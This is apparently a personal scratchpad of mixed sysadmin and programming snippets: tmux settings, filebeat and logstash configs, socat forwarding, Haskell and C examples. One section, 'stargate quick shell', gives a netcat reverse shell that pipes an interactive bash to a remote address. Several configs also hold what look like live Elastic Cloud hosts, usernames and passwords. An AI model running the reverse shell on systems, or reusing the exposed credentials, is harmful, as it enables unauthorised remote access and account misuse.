[js object] | |
var EXAMPLE = { | |
foo: 'hello', | |
hello: 42, | |
payload: new Buffer('a'), | |
meh: { | |
b: { | |
tmp: { | |
baz: 1000 | |
} | |
}, | |
lol: 'lol' | |
} | |
} | |
--------------------------------- | |
[protobuf schema] | |
message SearchRequest { | |
required string query = 1; | |
optional int32 page_number = 2; | |
optional int32 result_per_page = 3 [default = 10]; | |
enum Corpus { | |
UNIVERSAL = 0; | |
WEB = 1; | |
IMAGES = 2; | |
LOCAL = 3; | |
NEWS = 4; | |
PRODUCTS = 5; | |
VIDEO = 6; | |
} | |
optional Corpus corpus = 4 [default = UNIVERSAL]; | |
} | |
--------------------------------- | |
[openssl tip] | |
openssl x509 -text -noout -in cert.txt | |
--------------------------------- | |
[inotify watch a folder for changes] | |
inotifywait -mr --exclude '.git' -e create somefolder/ | |
--------------------------------- | |
[yml tip] | |
pip install pyyaml
python -c 'import sys, yaml, json; json.dump(yaml.load(sys.stdin), sys.stdout, indent=4)' < docker-compose.yml > /tmp/docker-compose.json | |
--------------------------------- | |
[Windows network adapters] | |
ncpa.cpl | |
--------------------------------- | |
[rpi alt] | |
nexx wt3020f | |
--------------------------------- | |
[rpi kali] | |
http://aircrack-ng.org/doku.php?id=compatibility_drivers | |
--------------------------------- | |
[rpi3b xpt2046 -> /etc/X11/xorg.conf.d/] | |
Section "Device" | |
# WaveShare SpotPear 3.5", framebuffer 1 | |
Identifier "uga" | |
Driver "fbdev"
Option "fbdev" "/dev/fb1" | |
Option "ShadowFB" "off" | |
EndSection | |
Section "Monitor" | |
# Primary monitor. WaveShare SpotPear 480x320 | |
Identifier "WSSP" | |
EndSection | |
Section "Screen" | |
Identifier "primary" | |
Device "uga" | |
Monitor "WSSP" | |
EndSection | |
Section "ServerLayout" | |
Identifier "default" | |
Screen 0 "primary" 0 0 | |
EndSection | |
--------------------------------- | |
[golang url download for arm] | |
https://gist.github.com/simoncos/49463a8b781d63b5fb8a3b666e566bb5 | |
--------------------------------- | |
[dot_tmux.conf] | |
set-environment -g CHERE_INVOKING 1 | |
set -g display-panes-time 5000 | |
set-window-option -g mode-keys vi | |
bind-key -T copy-mode-vi 'v' send -X begin-selection | |
bind-key -T copy-mode-vi 'y' send -X copy-selection-and-cancel | |
set -g status-bg black | |
set -g status-fg white | |
set -g default-terminal "xterm-256color" | |
bind-key u run "tmux capture-pane \; tmux save-buffer ~/tmuxdb/captures/\"$(date +'%Y%m%dT%H%M%S')\"" \; display 'captured' | |
#bind-key a run "~/bin/tsave.sh" \; display 'saving buffers ...' | |
bind r source-file ~/.tmux.conf \; display 'reloaded' | |
#set -g visual-activity on | |
#bind-key C run "~/tmuxdb/clearbuffers.sh" \; display 'All buffers cleared' | |
bind-key R command-prompt -I '-b ' 'setb %1' | |
bind-key S command-prompt -I '-s ' 'new-session %1' | |
bind-key k command-prompt -I '-t ' 'kill-session %1' | |
bind-key A kill-session -C | |
bind-key - choose-buffer "delete-buffer -b '%%'" | |
set-option -g status-left-length 255 | |
set -g status-left '#[fg=green,bg=black,bold]#S #[fg=white,bg=colour19,bold][#{pane_current_path}]' | |
set -g status-right '#[fg=white,bg=colour19,bold] %a %d/%b #[fg=green,bg=colour8,bold] %H:%M ' | |
bind-key c new-window -c "#{pane_current_path}" | |
bind-key % split-window -h -c "#{pane_current_path}" | |
bind-key '"' split-window -v -c "#{pane_current_path}" | |
# activity window | |
setw -g monitor-activity on | |
setw -g window-status-activity-bg white | |
setw -g window-status-activity-fg red | |
set-option -g -s status-interval 1 | |
--------------------------------- | |
[nc file receiver] | |
#!/bin/sh | |
# | |
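# my reading: the first connection delivers the target filename, the second delivers
# the file contents; zero-size leftovers are cleaned up afterwards.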
while true;do | |
f=$(nc -l 14345) | |
nc -l 14345 > /cygdrive/c/stargate/$f | |
printf "+" | |
#sleep 1 | |
find /cygdrive/c/stargate/ -type f -size 0 -exec rm {} \; | |
done | |
--------------------------------- | |
[rpi p4wnp1] | |
https://github.com/mame82/P4wnP1/blob/master/setup.cfg#L39 | |
--------------------------------- | |
[kali start ssh server] | |
systemctl start ssh.socket | |
--------------------------------- | |
[vnc tips] | |
[linux server] | |
vncserver | |
... | |
vncserver -kill :1 | |
[linux client/cygwin] | |
vncviewer ipaddr:5901 | |
--------------------------------- | |
[systemd timesyncd ntp service setting tip] | |
systemctl status systemd-timesyncd | |
echo 'NTP=time00.ncr.com' >> /etc/systemd/timesyncd.conf | |
--------------------------------- | |
[c++ map] | |
#include <list>
#include <functional>
// recursive, functional-style map over a std::list
template <typename T, typename U>
std::list<U> map (std::function<U(T)> f, std::list<T> xs)
{
    if (xs.empty())
        return std::list<U>();
    U y = f(xs.front());
    xs.pop_front();
    std::list<U> ys = map<T,U>(f, xs);
    ys.push_front(y);
    return ys;
}
--------------------------------- | |
[windows networking tips] | |
netsh interface ip show tcpconnections | |
--------------------------------- | |
[ssh md5 fingerprint] | |
ssh-keygen -E md5 -lf .ssh/authorized_keys | |
--------------------------------- | |
[reverse DNS of up machines; won't find down machines]
# sweep scan | |
nmap -sP 153.77.225.0/24 | |
# (@Windows) specific ip | |
nslookup 192.168.3.123 | |
tracert 192.168.3.123 | |
--------------------------------- | |
[nc file server] | |
while true;do printf "L";req=$(nc -l 1234);printf "S";nc -l 1234 < $req;done | |
--------------------------------- | |
[main.c read from stdin] | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#ifdef _WIN32 | |
#include <io.h> | |
#define read _read | |
#define fileno _fileno | |
#define STDIN_FILENO 0 | |
#else | |
#include <unistd.h> | |
#endif | |
#define BUF_SIZE 256 | |
/* Description: | |
* ./main [< line.txt] | |
*/ | |
int main(int argc, char *argv[]) | |
{ | |
char buffer[BUF_SIZE]; | |
int nread = 0,stdin_fileno = fileno(stdin); | |
printf("%d\n", argc); | |
memset(buffer, 0x00, BUF_SIZE); | |
nread = read (STDIN_FILENO, buffer, BUF_SIZE); | |
printf("[%d]\n",nread); | |
printf("[%s]", buffer); | |
return 0; | |
} | |
--------------------------------- | |
[stargate quick shell] | |
# from server side | |
mkfifo /tmp/stargate | |
while true;do cat /tmp/stargate | /bin/bash -i 2>&1 | nc $CLIENT_IPADDR 14344 > /tmp/stargate;printf ".";sleep 5;done | |
# from client side | |
nc -l 14344 | |
# Result: A shell is operative at the client side | |
--------------------------------- | |
[nspire: recursive function] | |
f(x):=when(x=0,1,x*f(x-1)) | |
--------------------------------- | |
[keyboard layout] | |
setxkbmap us -variant colemak | |
--------------------------------- | |
[this is a test] | |
hello | |
--------------------------------- | |
[filebeat indexing tips] | |
filebeat.inputs: | |
########### | |
- type: log | |
fields: | |
document_type: fromWalmart | |
paths: | |
- c:\elk\jag100\file.log | |
- c:\elk\jag100\test.dat | |
########### | |
- type: tcp | |
fields: | |
document_type: fromNetwork | |
host: "153.59.201.187:9000" | |
max_message_size: 10MiB | |
tags: ["tcp_9000"] | |
########### | |
- type: log | |
fields: | |
document_type: fromKroger | |
paths: | |
- c:\elk\kroger\apache.log | |
########### | |
- type: log | |
fields: | |
document_type: fromOthers | |
paths: | |
- c:\elk\others\* | |
- c:\elk\others\*\* | |
#output.logstash: | |
# hosts: ["192.168.3.70:5044"] | |
# hosts: ["jag-ingress.ncr.systems:5044"] | |
output.elasticsearch: | |
hosts: ["ba230b9570ccc5522.us-east-1.aws.found.io:443"] | |
protocol: "https" | |
username: "elastic" | |
password: "tspDMTT6I71d2liMRH" | |
indices: | |
- index: "from-153.59.201.187-%{+yyyy.MM.dd}" | |
when.contains: | |
message: "WARN" | |
- index: "error-%{[beat.version]}-%{+yyyy.MM.dd}" | |
when.contains: | |
message: "ERR" | |
filebeat.config.modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
setup.template.settings: | |
index.number_of_shards: 3 | |
processors: | |
- add_host_metadata: ~ | |
- add_cloud_metadata: ~ | |
--------------------------------- | |
[fpython: sums list of numbers] | |
# sums a list of numbers | |
def f (p): | |
if not isinstance (p,list): | |
raise ValueError ("type error") | |
x, *xs = p | |
return x if xs == [] else x + f (xs) | |
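# my note: this also raises on an empty list, since "x, *xs = p" needs at least one element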
--------------------------------- | |
[git tips: retrack] | |
git clean -fdx;sleep 1;git reset --hard HEAD | |
--------------------------------- | |
[midl small working IDL file] | |
import "unknwn.idl"; | |
[ | |
object, | |
uuid(1221db62-f3d8-11d4-825d-00104b3646c0), | |
helpstring("interface IAdd is used for implementing a super-fast addition Algorithm") | |
] | |
interface IAdd : IUnknown | |
{ | |
HRESULT SetNum1(long nX1); | |
HRESULT SetNum2(long nX2); | |
HRESULT DoAdd([out,retval] long *pBuffer); | |
}; | |
[ | |
uuid(3ff1aab8-f3d8-11d4-825d-00104b3646c0), | |
helpstring("Interfaces for algorithm implementations .") | |
] | |
library MathLib | |
{ | |
importlib("stdole32.tlb"); | |
importlib("stdole2.tlb"); | |
interface IAdd; | |
} | |
--------------------------------- | |
[midl MIDL2398: cannot execute MIDL engine] | |
https://asciinema.org/a/W2wEnv4y8nWHNWl5P3NIw8GnF | |
--------------------------------- | |
[xml tips] | |
# Get overall feel of the xml's structure | |
xml_elcount file.xml | |
# Enumerate name attribute values of class node | |
xml sel -t -v '//class/@name' file.xml | sort > /tmp/lista | |
# Show common values between two sorted lists | |
comm -12 /tmp/lista /tmp/listb | |
# Show values only in lista | |
comm -23 /tmp/lista /tmp/listb | |
# Show values only in listb | |
comm -13 /tmp/lista /tmp/listb | |
--------------------------------- | |
[lucene queries] | |
# Find all docs whose host field must not equal localhost | |
# and whose @timestamp field is greater than year 2000. | |
# Sort the result using the @timestamp field in ascending order | |
# and display only two fields: @timestamp, host | |
{ | |
"query":{ | |
"bool":{ | |
"must_not":{ | |
"term":{ "host":"localhost" } | |
}, | |
"must": { | |
"range": { | |
"@timestamp": { "gt": "2000-01-01T00:01:01.968Z" } | |
} | |
} | |
} | |
}, | |
"sort":{ | |
"@timestamp":{ "order":"asc" } | |
}, | |
"_source": ["@timestamp","host"] | |
} | |
--------------------------------- | |
[nixos: thinkfan configuration in /etc/nixos/configuration.nix] | |
# Thinkpad T440 | |
# postconditions: | |
# 1) status should be enabled: | |
# cat /proc/acpi/ibm/fan | |
# 2) No errors in systemd logs: | |
# journalctl -u thinkfan.service -f | |
services = { | |
thinkfan = { | |
enable = true; | |
sensors = '' | |
# Entries here discovered by: | |
# find /sys/devices -type f -name "temp*_input" | |
hwmon /sys/devices/platform/coretemp.0/hwmon/hwmon2/temp3_input | |
hwmon /sys/devices/platform/coretemp.0/hwmon/hwmon2/temp1_input | |
hwmon /sys/devices/platform/coretemp.0/hwmon/hwmon2/temp2_input | |
hwmon /sys/devices/virtual/hwmon/hwmon1/temp1_input | |
''; | |
levels = '' | |
(0, 0, 42) | |
(1, 40, 47) | |
(2, 45, 52) | |
(3, 50, 57) | |
(4, 55, 62) | |
(5, 60, 77) | |
(7, 73, 93) | |
(127, 85, 32767) | |
''; | |
}; | |
} | |
--------------------------------- | |
[filebeat fields] | |
filebeat.inputs: | |
- type: log | |
fields: | |
document_type: fromWalmart | |
paths: | |
- c:\elk\jag100\file.log | |
- c:\elk\jag100\test.dat | |
- type: tcp | |
fields: | |
document_type: fromNetwork | |
host: "153.59.201.187:9000" | |
max_message_size: 10MiB | |
tags: ["smeagol"] | |
- type: log | |
fields: | |
document_type: fromKroger | |
paths: | |
- c:\elk\kroger\apache.log | |
filebeat.config.modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
setup.template.settings: | |
index.number_of_shards: 3 | |
setup.kibana: | |
output.logstash: | |
#hosts: ["192.168.3.69:5044","192.168.3.70:5044"] | |
#loadbalance: true | |
#worker: 3 | |
hosts: ["192.168.3.70:5044"] | |
#hosts: ["jag-ingress.ncr.systems:5044"] | |
processors: | |
- add_host_metadata: ~ | |
- add_cloud_metadata: ~ | |
--------------------------------- | |
[logstash ruby snippet] | |
require 'openssl' | |
puts OpenSSL::Cipher.ciphers | |
--------------------------------- | |
[logstash: logstash-filter-cipher algorithm] | |
AES-128-CBC | |
AES-192-CBC | |
AES-256-CBC | |
AES-128-CFB | |
AES-192-CFB | |
AES-256-CFB | |
AES-128-CFB8 | |
AES-192-CFB8 | |
AES-256-CFB8 | |
AES-128-ECB | |
AES-192-ECB | |
AES-256-ECB | |
AES-128-OFB | |
AES-192-OFB | |
AES-256-OFB | |
AES128 | |
AES192 | |
AES256 | |
BF | |
BF-CBC | |
BF-CFB | |
BF-CFB8 | |
BF-ECB | |
BF-OFB | |
CAMELLIA-128-CBC | |
CAMELLIA-192-CBC | |
CAMELLIA-256-CBC | |
CAMELLIA-128-CFB | |
CAMELLIA-192-CFB | |
CAMELLIA-256-CFB | |
CAMELLIA-128-CFB8 | |
CAMELLIA-192-CFB8 | |
CAMELLIA-256-CFB8 | |
CAMELLIA-128-ECB | |
CAMELLIA-192-ECB | |
CAMELLIA-256-ECB | |
CAMELLIA-128-OFB | |
CAMELLIA-192-OFB | |
CAMELLIA-256-OFB | |
CAMELLIA128 | |
CAMELLIA192 | |
CAMELLIA256 | |
CAST | |
CAST-CBC | |
CAST5-CBC | |
CAST5-CFB | |
CAST5-CFB8 | |
CAST5-ECB | |
CAST5-OFB | |
CAST6-CBC | |
CAST6-CFB | |
CAST6-CFB8 | |
CAST6-ECB | |
CAST6-OFB | |
DES | |
DES-CBC | |
DES-CFB | |
DES-CFB8 | |
DES-ECB | |
DES-OFB | |
DES-EDE | |
DES-EDE-CBC | |
DES-EDE-CFB | |
DES-EDE-OFB | |
DES-EDE3 | |
DES-EDE3-CBC | |
DES-EDE3-CFB | |
DES-EDE3-CFB8 | |
DES-EDE3-ECB | |
DES-EDE3-OFB | |
DES3 | |
RC2 | |
RC2-CBC | |
RC2-CFB | |
RC2-CFB8 | |
RC2-ECB | |
RC2-OFB | |
RC2-40-CBC | |
RC2-64-CBC | |
RC4 | |
RC4-40 | |
SEED | |
SEED-CBC | |
SEED-CFB | |
SEED-CFB8 | |
SEED-ECB | |
SEED-OFB | |
aes-128-cbc | |
aes-192-cbc | |
aes-256-cbc | |
aes-128-cfb | |
aes-192-cfb | |
aes-256-cfb | |
aes-128-cfb8 | |
aes-192-cfb8 | |
aes-256-cfb8 | |
aes-128-ecb | |
aes-192-ecb | |
aes-256-ecb | |
aes-128-ofb | |
aes-192-ofb | |
aes-256-ofb | |
aes128 | |
aes192 | |
aes256 | |
bf | |
bf-cbc | |
bf-cfb | |
bf-cfb8 | |
bf-ecb | |
bf-ofb | |
camellia-128-cbc | |
camellia-192-cbc | |
camellia-256-cbc | |
camellia-128-cfb | |
camellia-192-cfb | |
camellia-256-cfb | |
camellia-128-cfb8 | |
camellia-192-cfb8 | |
camellia-256-cfb8 | |
camellia-128-ecb | |
camellia-192-ecb | |
camellia-256-ecb | |
camellia-128-ofb | |
camellia-192-ofb | |
camellia-256-ofb | |
camellia128 | |
camellia192 | |
camellia256 | |
cast | |
cast-cbc | |
cast5-cbc | |
cast5-cfb | |
cast5-cfb8 | |
cast5-ecb | |
cast5-ofb | |
cast6-cbc | |
cast6-cfb | |
cast6-cfb8 | |
cast6-ecb | |
cast6-ofb | |
des | |
des-cbc | |
des-cfb | |
des-cfb8 | |
des-ecb | |
des-ofb | |
des-ede | |
des-ede-cbc | |
des-ede-cfb | |
des-ede-ofb | |
des-ede3 | |
des-ede3-cbc | |
des-ede3-cfb | |
des-ede3-cfb8 | |
des-ede3-ecb | |
des-ede3-ofb | |
des3 | |
rc2 | |
rc2-cbc | |
rc2-cfb | |
rc2-cfb8 | |
rc2-ecb | |
rc2-ofb | |
rc2-40-cbc | |
rc2-64-cbc | |
rc4 | |
rc4-40 | |
seed | |
seed-cbc | |
seed-cfb | |
seed-cfb8 | |
seed-ecb | |
seed-ofb | |
--------------------------------- | |
[networx: udp server that forwards to tcp server] | |
socat UDP-LISTEN:2222,reuseaddr,fork TCP:localhost:1111 | |
--------------------------------- | |
[networx: tcp server that forwards to udp server] | |
socat TCP-LISTEN:2222,reuseaddr,fork UDP:localhost:1111 | |
--------------------------------- | |
[networx: tcp forever running server at port 1111]
socat - TCP-LISTEN:1111,reuseaddr,fork | |
--------------------------------- | |
[networx: udp forever running server at port 1111]
socat - UDP-LISTEN:1111,reuseaddr,fork | |
--------------------------------- | |
[jagdown logstash.conf] | |
input { | |
beats { | |
port => 5044 | |
} | |
tcp { | |
port => 14344 | |
} | |
} | |
filter { | |
# https://discuss.elastic.co/t/logstash-errors-after-upgrading-to-filebeat-6-3-0/135984/6 | |
mutate { | |
remove_field => [ "[host][name]" ] | |
remove_field => [ "[host][id]" ] | |
remove_field => [ "[host][architecture]" ] | |
remove_field => [ "[host][os][platform]" ] | |
remove_field => [ "[host][os][version]" ] | |
remove_field => [ "[host][os][family]" ] | |
remove_field => [ "[host][ip]" ] | |
remove_field => [ "[host][mac]" ] | |
remove_field => [ "[host][os]" ] | |
remove_field => [ "[host]" ] | |
} | |
mutate { | |
add_field => { | |
"host" => "%{[beat][hostname]}" | |
} | |
} | |
# my test stuff | |
if ([source]) { | |
mutate { | |
add_field => { "logfile" => "%{source}" } | |
} | |
} else { | |
mutate { | |
add_field => { | |
"logfile" => "" | |
"comment" => "not from logfile" | |
} | |
} | |
} | |
} | |
output { | |
stdout { | |
codec => rubydebug | |
} | |
#elasticsearch { | |
# hosts => ["${ESURL}"] | |
# user => "${ESUSER}" | |
# password => "${ESPASS}" | |
# index => "jagdown-%{+YYYY.MM.dd}" | |
#} | |
#file { | |
# path => "/tmp/rx.log" | |
# codec => line { format => "rx: %{message}" } | |
#} | |
elasticsearch { | |
hosts => "elastic-local-node:9200" | |
manage_template => false | |
index => "jagdown-%{+YYYY.MM.dd}" | |
} | |
gelf { | |
host => "localhost" | |
port => 12201 | |
protocol => "UDP" | |
} | |
} | |
--------------------------------- | |
[docker tips] | |
docker run -d --name=jag_logstash -v /area51/:/area51/ -v /area51/config/filebeat.yml:/usr/share/filebeat/filebeat.yml -v /area51/filebeat/data/:/usr/share/filebeat/data/ -v /area51/filebeat/logs/:/usr/share/filebeat/logs/ docker.elastic.co/beats/filebeat:6.5.1
filebeat.config: | |
prospectors: | |
path: ${path.config}/prospectors.d/*.yml | |
reload.enabled: false | |
modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
processors: | |
- add_cloud_metadata: | |
filebeat.inputs: | |
- type: log | |
enabled: true | |
paths: | |
- /shared/support/* | |
- /shared/support/*/* | |
#- c:\programdata\elasticsearch\logs\* | |
#filebeat.inputs: | |
# - type: udp | |
# host: "172.17.0.3:14344" | |
#setup.template.name: "filebeat" | |
#setup.template.pattern: "filebeat-*" | |
# | |
#output.elasticsearch: | |
# hosts: ['https://eb756457ba230b9570ccc5522.us-east-1.aws.found.io:9243'] | |
# username: "elastic" | |
# password: "UtspDMTT6I71d2liMRH" | |
# index: "jagdown-%{+yyyy.MM.dd}" | |
output.logstash: | |
hosts: ["172.17.0.2:5044"] | |
--------------------------------- | |
[elasticsearch logstash-output-gelf custom field] | |
input { | |
beats { | |
port => 5044 | |
} | |
tcp { | |
port => 14344 | |
} | |
#exec { | |
# command => "date > /tmp/date.log" | |
# interval => 10 | |
#} | |
#file { | |
# path => ["/tmp/date.log"] | |
#} | |
#file { | |
# path => ["/logdir/*"] | |
# mode => "read" | |
#} | |
} | |
filter { | |
# temp fix https://discuss.elastic.co/t/logstash-errors-after-upgrading-to-filebeat-6-3-0/135984/6 | |
mutate { | |
remove_field => [ "[host]" ] | |
} | |
mutate { | |
add_field => { | |
"host" => "%{[beat][hostname]}" | |
} | |
} | |
if ([source]) { | |
mutate { | |
add_field => { "logfile" => "%{source}" } | |
} | |
} else { | |
mutate { | |
add_field => { | |
"logfile" => "" | |
"comment" => "not from logfile" | |
} | |
} | |
} | |
} | |
output { | |
stdout { | |
codec => rubydebug | |
} | |
elasticsearch { | |
hosts => ["https://6bd430aceb756457ba230b9570ccc55229.us-east-1.aws.found.io:443"] | |
#protocol: "https" | |
user => "elastic" | |
password => "3oq01hUtspDMTT6I71d2liMRH141" | |
index => "jagdown-%{+YYYY.MM.dd}" | |
} | |
# "UDP" is default | |
gelf { | |
host => "192.168.3.69" | |
port => 12201 | |
protocol => "TCP" | |
#ship_metadata => true | |
#custom_fields => {"aaa" => "%{logfile}"} | |
#ignore_metadata => [] | |
} | |
#file { | |
# path => "/tmp/rx.log" | |
# codec => line { format => "foo: %{source}" } | |
#} | |
#udp { | |
# #mode => "client" | |
# host => "192.168.2.234" | |
# port => 161 | |
#} | |
} | |
--------------------------------- | |
[create 1024 bytes of random binary data] | |
dd if=/dev/urandom of=file.dat bs=1 count=1024 | |
--------------------------------- | |
[jq tips search match array] | |
# select the array element whose offset is 0 | |
jq '.hits.hits[] | select(._source.offset==0)' input.json | |
# sorting the array from oldest to newest based on @timestamp field | |
jq '.hits.hits |= sort_by(._source."@timestamp")' input.json | |
# get docs sorted by @timestamp field from oldest to newest | |
curl -s -H 'content-type:application/json' -XGET "$ESURL/winlogbeat-*/_search?pretty" -d'{"sort":[{"@timestamp":{"order":"asc"}}],"query":{"match_all":{}}}' | |
--------------------------------- | |
[elasticsearch: logstash temp fix] | |
input { | |
beats { | |
port => 5044 | |
} | |
tcp { | |
port => 14344 | |
} | |
#exec { | |
# command => "date > /tmp/date.log" | |
# interval => 10 | |
#} | |
#file { | |
# path => ["/tmp/date.log"] | |
#} | |
#file { | |
# path => ["/logdir/*"] | |
# mode => "read" | |
#} | |
} | |
filter { | |
# temp fix https://discuss.elastic.co/t/logstash-errors-after-upgrading-to-filebeat-6-3-0/135984/6 | |
mutate { | |
remove_field => [ "[host]" ] | |
} | |
mutate { | |
add_field => { | |
"host" => "%{[beat][hostname]}" | |
} | |
} | |
} | |
output { | |
stdout { | |
codec => rubydebug | |
} | |
elasticsearch { | |
hosts => ["https://us-east-1.aws.found.io:9243"] | |
#protocol: "https" | |
user => "elastic" | |
password => "T6I71d2liMRH" | |
index => "jagdown-%{+YYYY.MM.dd}" | |
} | |
# "UDP" is default | |
gelf { | |
host => "172.17.0.6" | |
port => 12201 | |
protocol => "TCP" | |
} | |
#udp { | |
# #mode => "client" | |
# host => "192.168.2.234" | |
# port => 161 | |
#} | |
} | |
--------------------------------- | |
[elasticsearch: logstash.conf] | |
input { | |
beats { | |
port => 5044 | |
} | |
tcp { | |
port => 14344 | |
} | |
#exec { | |
# command => "date > /tmp/date.log" | |
# interval => 10 | |
#} | |
#file { | |
# path => ["/tmp/date.log"] | |
#} | |
#file { | |
# path => ["/logdir/*"] | |
# mode => "read" | |
#} | |
} | |
output { | |
stdout { | |
codec => rubydebug | |
} | |
elasticsearch { | |
hosts => ["https://us-east-1.aws.found.io:9243"] | |
#protocol: "https" | |
user => "elastic" | |
password => "T6I71d2liMRH" | |
index => "jagdown-%{+YYYY.MM.dd}" | |
} | |
#udp { | |
# #mode => "client" | |
# host => "192.168.2.234" | |
# port => 161 | |
#} | |
} | |
--------------------------------- | |
[elasticsearch: filebeat.yml] | |
filebeat.config: | |
prospectors: | |
path: ${path.config}/prospectors.d/*.yml | |
reload.enabled: false | |
modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
processors: | |
- add_cloud_metadata: | |
filebeat.inputs: | |
- type: log | |
enabled: true | |
paths: | |
- /logdir/* | |
#- c:\programdata\elasticsearch\logs\* | |
#filebeat.inputs: | |
# - type: udp | |
# host: "172.17.0.3:14344" | |
#setup.template.name: "filebeat" | |
#setup.template.pattern: "filebeat-*" | |
# | |
#output.elasticsearch: | |
# hosts: ['https://5522.us-east-1.aws.found.io:9243'] | |
# username: "elastic" | |
# password: "DMTT6I71d2liMRH" | |
# index: "jagdown-%{+yyyy.MM.dd}" | |
output.logstash: | |
hosts: ["172.17.0.2:5044"] | |
--------------------------------- | |
[elasticsearch: search pattern and count] | |
#!/bin/sh | |
# | |
index="$1" | |
mkdir -p /tmp/fk/query/ | |
curl -s -H 'content-type:application/json' -XGET \ | |
"$ESURL/$index/_search?pretty" \ | |
-d '{"query":{"match":{"source":"/logdir/eventfile_0000000090.jag.zip.base64"}}}' > /tmp/fk/query/0.json | |
count=$(jq '.hits.total' /tmp/fk/query/0.json) | |
if [ -z "$count" ];then | |
echo "Index not found" | |
exit 1 | |
fi | |
echo "Downloading $count documents ..." | |
sleep 3 | |
for((i=1;i<count;i=i+10));do | |
curl -s -H 'content-type:application/json' -XGET \ | |
"$ESURL/$index/_search?pretty" \ | |
-d '{"query":{"match":{"source":"/logdir/eventfile_0000000090.jag.zip.base64"}}}' > /tmp/fk/query/$i.json | |
done | |
--------------------------------- | |
[elasticsearch _search] | |
#!/bin/sh | |
# | |
index="$1" | |
s=$(curl -s -XGET "$ESURL/_cat/indices?v" | grep -w $index) | |
count=$(echo $s | cut -d' ' -f7) | |
mkdir -p /tmp/fk/$index | |
if [ -z "$count" ];then | |
echo "Index not found" | |
exit 1 | |
fi | |
echo "Downloading $count documents ..." | |
sleep 3 | |
for((i=0;i<count;i=i+10));do | |
curl -s -H 'content-type:application/json' -XGET \ | |
"$ESURL/$index/_search?from=$i&pretty" \ | |
| tee /tmp/fk/$index/$i.json | |
done | |
--------------------------------- | |
[networking: scripting wpa_cli] | |
#!/bin/sh | |
# | |
[ $# -lt 3 ] && exit 1 | |
interface=$1 | |
ssid=\"$2\" | |
psk=\"$3\" # does not work. how? | |
netid=$(wpa_cli -i $interface add_network) | |
wpa_cli -i $interface set_network $netid ssid $ssid | |
wpa_cli -i $interface set_network $netid psk '"12345678"' | |
wpa_cli -i $interface select_network $netid | |
--------------------------------- | |
[networking: wpa_cli finally nailed down while in boracay] | |
https://asciinema.org/a/b2R3Z62PzNweVyENDaHQIWNtU | |
--------------------------------- | |
[c/c++ include headers] | |
include: | |
c: | |
memcpy,memset: string.h | |
lseek: [sys/types.h,unistd.h] | |
printf: stdio.h | |
realloc: stdlib.h | |
assert: assert.h | |
exit: stdlib.h | |
c++: | |
cout: iostream | |
--------------------------------- | |
[elasticsearch working filebeat.yml] | |
filebeat.inputs: | |
- type: log | |
enabled: true | |
paths: | |
- c:\testlog\test.log | |
- c:\testlog\logdir\* | |
filebeat.config.modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
setup.template.settings: | |
index.number_of_shards: 3 | |
setup.kibana: | |
output.elasticsearch: | |
hosts: ["abcdefghijklmnopqrstuvwxyz.us-east-1.aws.found.io:443"] | |
protocol: "https" | |
username: "elastic" | |
password: "oaeuousnthtHXXeueou" | |
processors: | |
- add_host_metadata: ~ | |
- add_cloud_metadata: ~ | |
--------------------------------- | |
[elasticsearch basics] | |
curl -H 'content-type:application/json' -XGET 'https://username:[email protected]/pornindex/_search?pretty' -d '{"query":{"match_all":{}}}' | |
curl -XGET 'https://username:[email protected]/_cat?v&pretty' | |
--------------------------------- | |
[haskell tuple eq with don't care] | |
-- because cannot do it as: | |
-- (3,_) == (3,_) | |
(a,_) === (b,_) = a == b | |
--------------------------------- | |
[vim auto-indent] | |
filetype plugin indent on | |
" show existing tab with 4 spaces width | |
set tabstop=4 | |
" when indenting with '>', use 4 spaces width | |
set shiftwidth=4 | |
" On pressing tab, insert 4 spaces | |
set expandtab | |
--------------------------------- | |
[my haskell solution to aaron] | |
-- https://codereview.stackexchange.com/questions/207929/determining-whether-x-y-points-in-the-input-constitute-a-function/207944#207944 | |
main = undefined | |
input = [(0,1),(5,26),(3,9),(4,16),(5,25),(3,9),(7,49)] | |
isFuncPoint (p,q) ((a,b):xs) | (p,q) == (a,b) = True | |
| p == a = False | |
| null xs = True | |
| otherwise = isFuncPoint (p,q) xs | |
compute arr = foldr (\e acc -> e `isFuncPoint` arr:acc) [] arr | |
--------------------------------- | |
[haskell bubble sort. Scratching my way up to the ivory tower haha] | |
-- second evolution | |
main = undefined | |
doit [] = [] | |
doit [x] = [x] | |
doit (x:xs) | x > head xs = head xs:doit (x:tail xs) | |
| otherwise = x:doit xs | |
bsort xs = foldl (\acc e -> doit acc) xs xs | |
--------------------------------- | |
[awk tip by enzotib] | |
awk -F'[ :]*' '/Bcast/ { print $6 }' | |
--------------------------------- | |
[git gitignore tip] | |
* | |
!.gitignore | |
--------------------------------- | |
[vstudio gitignore] | |
## Ignore Visual Studio temporary files, build results, and | |
## files generated by popular Visual Studio add-ons. | |
## | |
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore | |
# User-specific files | |
*.rsuser | |
*.suo | |
*.user | |
*.userosscache | |
*.sln.docstates | |
# User-specific files (MonoDevelop/Xamarin Studio) | |
*.userprefs | |
# Build results | |
[Dd]ebug/ | |
[Dd]ebugPublic/ | |
[Rr]elease/ | |
[Rr]eleases/ | |
x64/ | |
x86/ | |
bld/ | |
[Bb]in/ | |
[Oo]bj/ | |
[Ll]og/ | |
# Visual Studio 2015/2017 cache/options directory | |
.vs/ | |
# Uncomment if you have tasks that create the project's static files in wwwroot | |
#wwwroot/ | |
# Visual Studio 2017 auto generated files | |
Generated\ Files/ | |
# MSTest test Results | |
[Tt]est[Rr]esult*/ | |
[Bb]uild[Ll]og.* | |
# NUNIT | |
*.VisualState.xml | |
TestResult.xml | |
# Build Results of an ATL Project | |
[Dd]ebugPS/ | |
[Rr]eleasePS/ | |
dlldata.c | |
# Benchmark Results | |
BenchmarkDotNet.Artifacts/ | |
# .NET Core | |
project.lock.json | |
project.fragment.lock.json | |
artifacts/ | |
# StyleCop | |
StyleCopReport.xml | |
# Files built by Visual Studio | |
*_i.c | |
*_p.c | |
*_h.h | |
*.ilk | |
*.meta | |
*.obj | |
*.iobj | |
*.pch | |
*.pdb | |
*.ipdb | |
*.pgc | |
*.pgd | |
*.rsp | |
*.sbr | |
*.tlb | |
*.tli | |
*.tlh | |
*.tmp | |
